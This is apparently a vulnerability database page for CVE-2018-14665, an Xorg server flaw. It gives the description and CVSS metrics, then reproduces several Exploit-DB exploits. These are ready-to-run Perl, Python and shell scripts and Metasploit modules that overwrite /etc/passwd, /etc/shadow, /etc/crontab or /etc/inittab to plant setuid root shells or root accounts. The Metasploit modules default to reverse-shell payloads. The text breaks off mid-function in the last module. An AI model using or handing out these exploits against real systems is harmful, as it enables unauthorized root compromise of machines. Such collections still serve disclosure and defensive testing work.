CVE-2018-14665 : Detail


CVSS v3 score: 6.6 / Medium
Category: Authorization problems (OWASP A01 - Broken Access Control)
4.38% (V3)
Attack vector: Physical
Published: 2018-10-25 18h00 +00:00
Updated: 2019-11-12 19h07 +00:00

CVE Description

A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission check for the -modulepath and -logfile options when starting Xorg allows unprivileged users with the ability to log in to the system via the physical console to escalate their privileges and run arbitrary code with root privileges.

CVE Information

Related Weaknesses

CWE-863: Incorrect Authorization
The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

Metrics

CVSS v3.0: 6.6 (MEDIUM), vector CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Physical

A vulnerability exploitable with Physical access requires the attacker to physically touch or manipulate the vulnerable component. Physical interaction may be brief (e.g. an evil maid attack [1]) or persistent. An example of such an attack is a cold boot attack, which allows an attacker to access disk encryption keys after gaining physical access to the system, or peripheral attacks such as Firewire/USB Direct Memory Access attacks.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker is authorized with (i.e. requires) privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges may have the ability to cause an impact only to non-sensitive resources.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

CVSS v2.0: 7.2, vector AV:L/AC:L/Au:N/C:C/I:C/A:C

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 45938

Publication date : 2018-12-03 23h00 +00:00
Author : 0xdono
EDB Verified : No

# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation
# Date: 29/11/2018
# Exploit Author: @0xdono
# Original Discovery and Exploit: Narendra Shinde
# Vendor Homepage: https://www.x.org/
# Platform: AIX
# Version: X Window System Version 7.1.1
# Fileset: X11.base.rte < 7.1.5.32
# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable)
# CVE: CVE-2018-14665
#
# Explanation:
# Incorrect command-line parameter validation in the Xorg X server can
# lead to privilege elevation and/or arbitrary files overwrite, when the
# X server is running with elevated privileges.
# The -logfile argument can be used to overwrite arbitrary files in the
# file system, due to incorrect checks in the parsing of the option.
#
# This is a port of the OpenBSD X11 Xorg exploit to run on AIX.
# It overwrites /etc/passwd in order to create a new user with root privileges.
# All currently logged in users need to be included when /etc/passwd is overwritten,
# else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user.
# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX,
# and is replaced by '-config'.
# ksh93 is used for ANSI-C quoting, and is installed by default on AIX.
#
# IBM has not yet released a patch as of 29/11/2018.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html
# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl
#
# Usage:
# $ oslevel -s
# 7100-04-00-0000
# $ Xorg -version
#
# X Window System Version 7.1.1
# Release Date: 12 May 2006
# X Protocol Version 11, Revision 0, Release 7.1.1
# Build Operating System: AIX IBM
# Current Operating System: AIX sovma470 1 7 00C3C6F54C00
# Build Date: 07 July 2006
# Before reporting problems, check http://wiki.x.org
# to make sure that you have the latest version.
# Module Loader present
# $ id
# uid=16500(nmyo) gid=1(staff)
# $ perl aixxorg.pl
# [+] AIX X11 server local root exploit
# [-] Checking for Xorg and ksh93
# [-] Opening /etc/passwd
# [-] Retrieving currently logged in users
# [-] Generating Xorg command
# [-] Opening /tmp/wow.ksh
# [-] Writing Xorg command to /tmp/wow.ksh
# [-] Backing up /etc/passwd to /tmp/passwd.backup
# [-] Making /tmp/wow.ksh executable
# [-] Executing /tmp/wow.ksh
# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh
# [-] Done
# [+] 'su wow' for root shell
# $ su wow
# # id
# uid=0(root) gid=0(system)
# # whoami
# root

#!/usr/bin/perl

print "[+] AIX X11 server local root exploit\n";

# Check Xorg is in path
print "[-] Checking for Xorg and ksh93 \n";
chomp($xorg = `command -v Xorg`);
if ($xorg eq ""){
    print "[X] Can't find Xorg binary, try hardcode it? exiting... \n";
    exit;
}

# Check ksh93 is in path
chomp($ksh = `command -v ksh93`);
if ($ksh eq ""){
    print "[X] Can't find ksh93 binary, try hardcode it? exiting... \n";
    exit;
}

# Read in /etc/passwd
print "[-] Opening /etc/passwd \n";
open($passwd_fh, '<', "/etc/passwd");
chomp(@passwd_array = <$passwd_fh>);
close($passwd_fh);

# Retrieve currently logged in users
print "[-] Retrieving currently logged in users \n";
@users = `who | cut -d' ' -f1 | sort | uniq`;
chomp(@users);

# For all logged in users, add their current passwd entry to string
# that will be used to overwrite passwd
$users_logged_in_passwd = '';
foreach my $user (@users) {
    $user .= ":";
    foreach my $line (@passwd_array) {
        if (index($line, $user) == 0) {
            $users_logged_in_passwd = $users_logged_in_passwd . '\n' . $line;
        }
    }
}

# Use '-config' as '-fp' (which is used in the original BSD exploit) is not written to log
print "[-] Generating Xorg command \n";
$blob = '-config ' . '$\'' . $users_logged_in_passwd . '\nwow::0:0::/:/usr/bin/ksh\n#' . '\'';

print "[-] Opening /tmp/wow.ksh \n";
open($fr, '>', "/tmp/wow.ksh");

# Use ksh93 for ANSI-C quoting
print "[-] Writing Xorg command to /tmp/wow.ksh \n";
print $fr '#!' . "$ksh\n";
print $fr "$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \n";
close $fr;

# Backup passwd
print "[-] Backing up /etc/passwd to /tmp/passwd.backup \n";
system("cp /etc/passwd /tmp/passwd.backup");

# Make script executable and run it
print "[-] Making /tmp/wow.ksh executable \n";
system("chmod +x /tmp/wow.ksh");
print "[-] Executing /tmp/wow.ksh \n";
system("/tmp/wow.ksh");

# Replace overwritten passwd with: original passwd + wow user
print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n";
$result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`;

print "[-] Done \n";
print "[+] 'su wow' for root shell \n";
Exploit Database EDB-ID : 45832

Publication date : 2018-11-12 23h00 +00:00
Author : bolonobolo
EDB Verified : No

# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE : CVE-2018-14665

# Explanation
# The only condition that has to be met for this PE to work via SSH is that the legitimate non-root user
# has to be logged in through the console at the moment the PE script is launched.
# In fact, during the logged-in session of the legitimate non-root user,
# a file with the name of the non-root user will be created in the /var/run/console folder.
# With that file present, the same non-root user can launch a Xorg command via SSH.
#
# Usage: $ python poc.py
# $ python poc.py
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#

#!/usr/bin/python

import os
import getpass
import subprocess

userList = []
path="/var/run/console/"

def getWhoami():
    return getpass.getuser()

def getConsole(path):
    p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
    (console, err) = p.communicate()
    consoleList = str.splitlines(console)
    return consoleList

def payload():
    f = open("/tmp/payload", "w")
    payload = ("cp /bin/sh /usr/local/bin/shell\n"
               "echo \"#include <stdio.h> \" > /tmp/shell.c\n"
               "echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
               "echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
               "echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
               "echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
               "gcc /tmp/shell.c -o /usr/local/bin/shell\n"
               "chmod 4777 /usr/local/bin/shell\n")
    f.write(payload)

def executePayload():
    os.system("chmod +x /tmp/payload")
    os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
    print "[*] crontab overwritten"
    os.system("sleep 5")
    os.system("pkill Xorg")
    print "[*] Xorg killed"
    os.system("sleep 120")
    return

def main():
    whoami = getWhoami()
    print "[*] Waiting for " + whoami + " to connect to the console"
    i = 0
    while (i == 0):
        consoleList = getConsole(path)
        for user in consoleList:
            if user == whoami :
                print "[*] OK --> " + user + " console opened"
                i = 1
    print "[*] Building root shell wait 2 minutes"
    payload()
    executePayload()
    print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
    os.system("/usr/local/bin/shell")

if __name__ == '__main__':
    main()
Exploit Database EDB-ID : 45908

Publication date : 2018-11-25 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::Kernel

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xorg X11 Server SUID privilege escalation',
      'Description'    => %q{
        This module attempts to gain root privileges with SUID Xorg X11 server
        versions 1.19.0 < 1.20.3.

        A permission check flaw exists for -modulepath and -logfile options when
        starting Xorg. This allows unprivileged users that can start the server
        the ability to elevate privileges and run arbitrary code under root
        privileges.

        This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
        CentOS default install will require console auth for the users session.
        Cron launches the payload so if Selinux is enforcing exploitation may
        still be possible, but the module will bail.

        Xorg must have SUID permissions and may not start if running.

        On exploitation a crontab.old backup file will be created by Xorg.
        This module will remove the .old file and restore crontab after
        successful exploitation. Failed exploitation may result in a corrupted
        crontab. On successful exploitation artifacts will be created
        consistent with starting Xorg and running a cron.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Narendra Shinde', # Discovery and exploit
          'Raptor - 0xdea',  # Modified exploit for cron
          'Aaron Ringo',     # Metasploit module
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
        ],
      'DisclosureDate' => 'Oct 25 2018',
      'References'     =>
        [
          [ 'CVE', '2018-14665' ],
          [ 'BID', '105741' ],
          [ 'EDB', '45697' ],
          [ 'EDB', '45742' ],
          [ 'EDB', '45832' ],
          [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
          [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
        ],
      'Platform'       => %w[openbsd linux],
      'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
      'SessionTypes'   => %w[shell meterpreter],
      'Targets'        =>
        [
          ['OpenBSD', { 'Platform' => 'unix', 'Arch' => [ ARCH_CMD ] } ],
          ['Linux x64', { 'Platform' => 'linux', 'Arch' => [ ARCH_X64 ] } ],
          ['Linux x86', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86 ] } ]
        ],
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'cmd/unix/reverse_openssl',
          'WfsDelay' => 120
        },
      'DefaultTarget'  => 0))
    register_advanced_options(
      [
        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
        OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
      ]
    )
  end

  def check
    # linux checks
    uname = cmd_exec "uname"
    if uname =~ /linux/i
      vprint_status "Running additional check for Linux"
      if datastore['ConsoleLock']
        user = cmd_exec "id -un"
        unless exist? "/var/run/console/#{user}"
          vprint_error "No console lock for #{user}"
          return CheckCode::Safe
        end
        vprint_good "Console lock for #{user}"
      end

      if selinux_installed?
        if selinux_enforcing?
          vprint_error 'Selinux is enforcing'
          return CheckCode::Safe
        end
      end
      vprint_good "Selinux is not an issue"
    end

    # suid program check
    xorg_path = cmd_exec "command -v Xorg"
    unless xorg_path.include?("Xorg")
      vprint_error "Could not find Xorg executable"
      return CheckCode::Safe
    end
    vprint_good "Xorg path found at #{xorg_path}"

    unless setuid? xorg_path
      vprint_error "Xorg binary #{xorg_path} is not SUID"
      return CheckCode::Safe
    end
    vprint_good "Xorg binary #{xorg_path} is SUID"

    # version check
    x_version = cmd_exec "Xorg -version"
    if x_version.include?("Release Date")
      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
        vprint_error "Xorg version #{v} not supported"
        return CheckCode::Safe
      end
    elsif x_version.include?("Fatal server error")
      vprint_error "User probably does not have console auth"
      vprint_error "Below is Xorg -version output"
      vprint_error x_version
      return CheckCode::Safe
    else
      vprint_warning "Could not parse Xorg -version output"
      return CheckCode::Appears
    end
    vprint_good "Xorg version #{v} is vulnerable"

    # process check for /X
    proc_list = cmd_exec "ps ax"
    if proc_list.include?('/X ')
      vprint_warning('Xorg in process list')
      return CheckCode::Appears
    end
    vprint_good('Xorg does not appear running')

    return CheckCode::Vulnerable
  end

  def on_new_session(session)
    if session.type.to_s.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
    else
      session.shell_command(@clean_up)
    end
    print_good "Returning session after cleaning"
  ensure
    super
  end

  def exploit
    check_status = check
    if check_status == CheckCode::Appears
      print_warning 'Could not get version or Xorg process possibly running, may fail'
    elsif check_status == CheckCode::Safe
      fail_with Failure::NotVulnerable, 'Target not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'This session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end
    print_good 'Passed all initial checks for exploit'

    pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
    @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
    xdisplay = datastore['Xdisplay']

    # Uploading file crontab will run
    print_status 'Uploading your payload, this could take a while'
    if payload.arch.first == 'cmd'
      write_file(pscript, payload.encoded)
    else
      write_file(pscript, generate_payload_exe)
    end
    register_file_for_cleanup pscript
    chmod pscript

    # Exploit steps on crontab so backing it up
    cmd_exec "cat /etc/crontab > #{pscript}.b"

    # Actual exploit with cron overwrite
    print_status 'Trying /etc/crontab overwrite'
    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
    Rex.sleep 5
    cmd_exec "pkill Xorg"
    Rex.sleep 1

    cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
    unless cron_check.include? pscript
      rm_f "#{pscript}.b"
      print_error 'Deleting crontab backup'
      fail_with Failure::NotVulnerable, '/etc/crontab not modified'
    end
    print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
  end
end
Exploit Database EDB-ID : 45697

Publication date : 2018-10-24 22h00 +00:00
Author : Hacker Fantastic
EDB Verified : No

#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet

cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su

Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root.
# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid
# and vulnerable in default OpenBSD.
#
# - https://hacker.house
echo [+] OpenBSD 6.4-stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old back
echo [+] type 'Password1' and hit enter for root
su -

EDB Note: Another version of it: https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
Exploit Database EDB-ID : 45742

Publication date : 2018-10-29 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : No

# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation
# Date: 2018-10-27
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: OpenBSD 6.3 and 6.4
# CVE : CVE-2018-14665
# raptor_xorgasm

#!/bin/sh
#
# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
# Copyright (c) 2018 Marco Ivaldi <[email protected]>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# This exploit targets OpenBSD's cron in order to escalate privileges to
# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical
# console, it works perfectly on pseudo-terminals connected via SSH as well.
#
# See also:
# https://lists.x.org/archives/xorg-announce/2018-October/002927.html
# https://www.exploit-db.com/exploits/45697/
# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850
#
# Usage:
# blobfish$ chmod +x raptor_xorgasm
# blobfish$ ./raptor_xorgasm
# [...]
# Be patient for a couple of minutes...
# [...]
# Don't forget to cleanup and run crontab -e to reload the crontab.
# -rw-r--r--  1 root  wheel  47327 Oct 27 14:48 /etc/crontab
# -rwsrwxrwx  1 root  wheel   7417 Oct 27 14:50 /usr/local/bin/pwned
# blobfish# id
# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# OpenBSD 6.4 (Xorg 1.19.6) [tested]
# OpenBSD 6.3 (Xorg 1.19.6) [tested]
#

echo "raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron"
echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>"

# prepare the payload
cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm

# trigger the bug
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg

# run the setuid shell
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned
Exploit Database EDB-ID : 46142

Publication date : 2019-01-13 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : No

#!/bin/sh
# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab)
# Date: 2018-11-25
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.x.org/
# Version: xorg-x11-server 1.19.0 - 1.20.2
# Tested on: Oracle Solaris 11.4
# CVE : CVE-2018-14665
#
# raptor_solgasm - xorg-x11-server LPE via Solaris inittab
# Copyright (c) 2018 Marco Ivaldi <[email protected]>
#
# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission
# check for -modulepath and -logfile options when starting Xorg. X server
# allows unprivileged users with the ability to log in to the system via
# physical console to escalate their privileges and run arbitrary code under
# root privileges (CVE-2018-14665).
#
# "In video games, this is what they call respawning" -- Nick Sax
#
# This exploit targets /etc/inittab in order to escalate privileges to root
# on Solaris 11 (no need to be connected to a physical console). Messing with
# inittab is considerably dangerous and you may trash your system, however the
# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't
# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING!
#
# See also:
# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_solgasm
# raptor@stalker:~$ ./raptor_solgasm
# [...]
# Now please be patient for a few minutes...
# [...]
# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab
# -rw-r--r--   1 root     staff      13870 nov 24 22:01 /etc/inittab
# -rw-r--r--   1 root     sys          967 nov 24 20:01 /etc/inittab.old
# -rwsrwxrwx   1 root     root     1249080 nov 24 22:05 /tmp/pwned
# root@stalker:/etc# id
# uid=0(root) gid=0(root)
#
# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):
# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_solgasm - xorg-x11-server LPE via Solaris inittab"
echo "Copyright (c) 2018 Marco Ivaldi <[email protected]>"

# prepare the payload
cat << EOF > /tmp/solgasm
cp /bin/zsh /tmp/pwned # fallback in case gcc is not available
echo "main(){setuid(0);setgid(0);system(\"/bin/bash\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /tmp/pwned
chmod 4777 /tmp/pwned
EOF
chmod +x /tmp/solgasm

# trigger the bug
PWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1)
cd /etc
Xorg -fp "${PWN}::respawn:/tmp/solgasm" -logfile inittab :1 &
sleep 5
pkill Xorg

# run the setuid shell
echo
echo "Now please be patient for a few minutes..."
echo
until [ -u /tmp/pwned ]; do sleep 1; done
echo "To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab"
ls -l /etc/inittab*
ls -l /tmp/pwned
sleep 1
/tmp/pwned
Exploit Database EDB-ID : 47701

Publication date : 2019-11-19 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xorg X11 Server Local Privilege Escalation',
      'Description'    => %q(
        WARNING: Successful execution of this module results in /etc/passwd being overwritten.

        This module is a port of the OpenBSD X11 Xorg exploit to run on AIX.

        A permission check flaw exists for -modulepath and -logfile options when
        starting Xorg. This allows unprivileged users that can start the server
        the ability to elevate privileges and run arbitrary code under root
        privileges.

        This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1.

        Due to permission restrictions of the crontab in AIX, this module does not
        use cron, and instead overwrites /etc/passwd in order to create a new user
        with root privileges. All currently logged in users need to be included
        when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME"
        variable' when attempting to change user. The Xorg '-fp' parameter used in
        the OpenBSD exploit does not work on AIX, and is replaced by '-config', in
        conjunction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.
      ),
      'Author'         =>
        [
          'Narendra Shinde',                  # Discovery and original FreeBSD exploit
          'Zack Flack <dzflack[at]gmail.com>' # Metasploit module and original AIX exploit
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Oct 25 2018',
      'Notes'          => { 'SideEffects' => [ CONFIG_CHANGES ] },
      'References'     =>
        [
          ['CVE', '2018-14665'],
          ['URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html'],
          ['URL', 'https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc'],
          ['URL', 'https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl'],
          ['EDB', '45938']
        ],
      'Platform'       => ['unix'],
      'Arch'           => [ARCH_CMD],
      'SessionTypes'   => ['shell'],
      'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'perl'
            }
        },
      'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_perl' },
      'Targets'        =>
        [
          ['IBM AIX Version 6.1', {}],
          ['IBM AIX Version 7.1', {}],
          ['IBM AIX Version 7.2', {}]
        ],
      'DefaultTarget'  => 1))
    register_options(
      [
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
      ]
    )
  end

  def check
    xorg_path = cmd_exec('command -v Xorg')
    if !xorg_path.include?('Xorg')
      print_error('Could not find Xorg executable')
      return Exploit::CheckCode::Safe
    end

    ksh93_path = cmd_exec('command -v ksh93')
    if !ksh93_path.include?('ksh')
      print_error('Could not find Ksh93 executable')
      return Exploit::CheckCode::Safe
    end

    if !xorg_vulnerable?
      print_error('Xorg version is not vulnerable')
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    status = check
    if status == Exploit::CheckCode::Safe
      fail_with(Failure::NotVulnerable, '')
    end

    if !writable?(datastore['WritableDir'])
      fail_with(Failure::BadConfig, "#{datastore['WritableDir']} is not writable")
    end

    xorg_path = cmd_exec('command -v Xorg')
    ksh93_path = cmd_exec('command -v ksh93')

    xorg_payload = generate_xorg_payload(xorg_path, ksh93_path, datastore['WritableDir'])
    xorg_script_path = "#{datastore['WritableDir']}/wow.ksh"
    upload_and_chmodx(xorg_script_path, xorg_payload)

    passwd_backup = "#{datastore['WritableDir']}/passwd.backup"
    print_status("Backing up /etc/passwd to #{passwd_backup}")
    cmd_exec("cp /etc/passwd #{passwd_backup}")
    register_file_for_cleanup(passwd_backup)

    print_status("Executing #{xorg_script_path}")
    cmd_exec(xorg_script_path)

    print_status('Checking if we are root')
    if root?
      shell_payload = %(#!#{ksh93_path}
#{payload.encoded}
)
      shell_script_path = "#{datastore['WritableDir']}/wowee.ksh"
      upload_and_chmodx(shell_script_path, shell_payload)

      print_status('Executing shell payload')
      cmd_exec("#{ksh93_path} -c \"echo #{shell_script_path} | su - wow &\"")

      print_status('Restoring original /etc/passwd')
      cmd_exec("su - wow -c \"cp #{passwd_backup} /etc/passwd\"")
    else
      fail_with(Failure::PayloadFailed, '')
    end
  end

  def generate_xorg_payload(xorg_path, ksh93_path, writabledir)
    passwd_file = read_file('/etc/passwd')
    passwd_array = passwd_file.split("\n")

    print_status('Retrieving currently logged in users')
    users = cmd_exec('who | cut -d\' \' -f1 | sort | uniq')
    users << "\n"
    users_array = users.split("\n")

    logged_in_users = ''
    if !users_array.empty?
      users_array.each do |user|
        user << ':'
        passwd_array.each do |line|
          if line.index(user) == 0
            logged_in_users << '\n'
            logged_in_users << line
          end
        end
      end
    end

    passwd_data = "$'#{logged_in_users}\\nwow::0:0::/:/usr/bin/ksh\\n#'"

    subdir_count = writabledir.count('/')
    relative_passwd = '../' * subdir_count + '../../etc/passwd'

    return %(#!#{ksh93_path}
#{xorg_path} -config #{passwd_data} -logfile #{relative_passwd} :1 > /dev/null 2>&1
)
  end

  def xorg_vulnerable?
    version = cmd_exec('lslpp -L | grep -i X11.base.rte | awk \'{ print $2 }\'')
    print_status("Xorg version is #{version}")
